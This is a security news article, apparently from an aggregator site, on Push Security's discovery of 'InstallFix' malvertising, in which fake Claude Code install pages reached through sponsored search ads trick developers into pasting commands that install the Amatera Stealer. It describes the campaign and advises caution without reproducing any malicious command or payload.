'InstallFix' Attacks Spread Fake Claude Code Sites

The success of Anthropic's Claude Code and other AI coding tools is being leveraged by a new version of the ClickFix method This article explores code install claude. . The threat campaign, which blends social engineering and malvertising, was found by researchers at Push Security.

The research team discovered that Google-sponsored links for searches like "Claude Code," "Claude Code install," and "Claude Code CLI" were the only way that phony Claude Code install pages were propagating. Jacques Louw, co-founder and chief product officer (CPO) of Push Security, stated in a blog post released on Friday that the installation pages for Anthropic's coding assistant are nearly identical to the original.

However, the Amatera Stealer malware, which can steal developers' credentials and grant attackers access to enterprise development environments, is deployed when victims copy the malicious install commands from the clone sites. Although this method, which Push Security refers to as "InstallFix," isn't particularly novel, Louw clarified that attackers have noticed that users are more likely to just copy and paste commands into their systems and run them. He says, "I think this campaign is specifically aimed at Claude Code because it's one of the tools (if not the tool) being adopted the fastest across the board."

"The high rate of new account creations we see across our customers for Anthropic products mirrors this." Related: The Battle for Firewall Backlogs in the Age of AI-Powered Development Push Security cautioned that the threat actors responsible for the InstallFix attacks are using domains from reputable providers like Tencent EdgeOne, Cloudflare Pages, and Squarespace, which seem harmless and blend in with regular traffic activity, in addition to abusing Google's sponsored links. According to Louw, Push Security has noticed this kind of abuse on almost all phishing websites and malicious links these days.

When copying and pasting commands into their terminals, users should exercise extreme caution and take extra time to confirm that the domains supplying these commands are legitimate.

Although Push Security supplied indicators of compromise (IoCs) for the InstallFix attacks, Louw stated that the information is not very useful because domains used in campaigns such as this one typically have a short lifespan.

'InstallFix' Attacks Spread Fake Claude Code Sites

Trending News

Coruna, DarkSword, and Democratizing Nation-State Exploit Kits

Coruna, DarkSword, and Democratizing Nation-State Exploit Kits

Apple Sends Lock Screen Alerts to Old iPhones About Active Web-Based Exploits

Apple Sends Lock Screen Alerts to Old iPhones About Active Web-Based Exploits

Wartime Usage of Compromised IP Cameras Highlight Their Danger

Wartime Usage of Compromised IP Cameras Highlight Their Danger

TeamPCP Pushes Malicious Telnyx Versions to PyPI, Hides Stealer in WAV Files

TeamPCP Pushes Malicious Telnyx Versions to PyPI, Hides Stealer in WAV Files

Hackers use phishing ZIP files to send PXA Stealer to steal money from banks and other financial institutions.

Hackers use phishing ZIP files to send PXA Stealer to steal money from banks and other financial institutions.

China improves the backdoor it uses to spy on telecom companies around the world.

China improves the backdoor it uses to spy on telecom companies around the world.

Telnyx PyPI Package With 742,000 downloads Compromised in TeamPCP Supply Chain Attack

Telnyx PyPI Package With 742,000 downloads Compromised in TeamPCP Supply Chain Attack

Open VSX Bug Let Malicious VS Code Extensions Bypass Pre-Publish Security Checks

Open VSX Bug Let Malicious VS Code Extensions Bypass Pre-Publish Security Checks

Attacks on infrastructure that have physical effects are down 25%.

Attacks on infrastructure that have physical effects are down 25%.

How mistakes can help businesses improve their security programs

How mistakes can help businesses improve their security programs